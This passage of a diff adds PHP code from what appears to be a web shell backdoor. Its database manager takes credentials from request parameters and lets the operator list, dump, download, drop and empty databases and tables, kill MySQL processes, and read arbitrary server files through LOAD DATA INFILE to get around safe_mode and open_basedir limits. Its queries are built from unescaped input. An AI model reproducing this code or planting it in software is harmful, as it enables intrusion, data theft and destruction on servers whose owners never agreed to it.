+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>�</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
